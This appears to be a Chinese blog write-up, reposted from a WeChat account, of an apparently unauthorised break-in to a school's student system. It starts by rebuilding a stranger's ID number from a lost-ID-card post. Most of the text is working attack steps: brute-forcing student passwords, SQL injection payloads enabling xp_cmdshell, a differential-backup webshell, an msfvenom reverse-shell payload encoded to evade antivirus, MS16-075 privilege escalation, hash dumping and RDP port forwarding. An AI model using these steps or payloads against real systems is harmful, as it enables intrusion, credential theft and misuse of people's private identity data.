一、前言
最近随便逛贴吧看到这样一篇帖子,有人捡到一张身份证,挂到了贴吧上让失主来认领,由于身份证的号码未完全打码,导致的一次渗透测试。
二、信息收集
通过前期的信息收集,我获得了两个有价值的url地址,一个是学生登录处(没有学生证号码)
一个是输入身份证就可以查询学号,寝室号的地址
由于隐私问题,我随便列举一个身份证号码:31190******6302333,星号的地方就是第一张图用手挡住的地方。根据这点信息可以获取完整的身份证号码。
1.先查看这个地方的身份证前6位是多少开头,获取到第一个星号的数字为3
2.后面的星号就是这个人的出身年份,由于是在校大学生,年份应该在1996-2000
3.最后一个星号,为出生的月份,月份为1-12,爆破下
获取到完整的身份证信息,可以根据这个身份证信息进行查询到学号
三、发现SQL注入
获取到学号,可以猜解学生密码(一般学校给学生账号的初始密码为8888,123456,123,身份证后6位等等),由于这个人的密码改了,可以根据利用学生号爆破其他人的账号密码,获取到2个账号密码
登进学生系统,发现sql注入
根据报错的sql语句,payload为:txtEnd=2019%2F9%2F9' as datetime);exec master..xp_cmdshell "whoami"-- 没有开启xp_cmdshell组件
开启xp_cmdshell组件
txtEnd=2019%2F9%2F9' as datetime);EXEC sp_configure 'show advanced options',1 RECONFIGURE EXEC sp_configure 'xp_cmdshell',1 RECONFIGURE;--
执行whoami,出现了错误代码5,降低了cmd的权限
四、差异备份getshell
我想应该是360之类的杀毒软件阻止了xp_cmdshell,这里可以利用差异备份进行getshell(需要绝对路径)
创建数据库:create database dbs;
第一次备份:backup database dbs to disk = 'D:wwwabc.bak';
创建表:use dbs;create table fx(cmd image);
表中插入数据:insert into fx(cmd) values(aspx一句话的16进制);
进行差异备份:backup database dbs to disk = '网站绝对路径' WITH DIFFERENTIAL,FORMAT;
访问地址,成功getshell
需要登录的状态才能访问到shell,可以利用中国蚁剑添加cookie来getshell
五、提权
执行tasklist,发现360杀毒软件,这个360有点垃圾,应该不是最新版,msf多编码几次就过了这个360
msfVENOM -a x64 --platform windows -p windows/meterpreter/reverse_tcp LHOST=xx.xxx.xxx.xxx LPORT=6666 -e x64/shikata_ga_nai -i 20 -f exe > backdoor.5.1.10.exe
metasploit执行如下:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost xx.xx.xx.xx
set lport 6666
exploit
查看补丁情况:systeminfo,发现ms16-075没有打补丁,利用metasploit提权
use exploit/windows/local/ms16_075_reflection_juicy
set payload windows/meterpreter/reverse_tcp
set session 1
set lhost xx.xx.xx.xx
set lport 6666
exploit
读取密码hash:run post/windows/gather/hashdump
读出来的hash可以到cmd5上解密出来,省得用mimikatz+procdump64得方式去读取密码明文了
最后端口转发登录服务器:portfwd add -l 3389 -p 3389 -r xx.xx.xx.xx(服务器内网地址)
五、后记
在写这个文章得时候,漏洞已经修复了,有2张图片用的以前得图片。
本文始发于微信公众号(疯猫网络):逛贴吧时引发得一次渗透测试
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论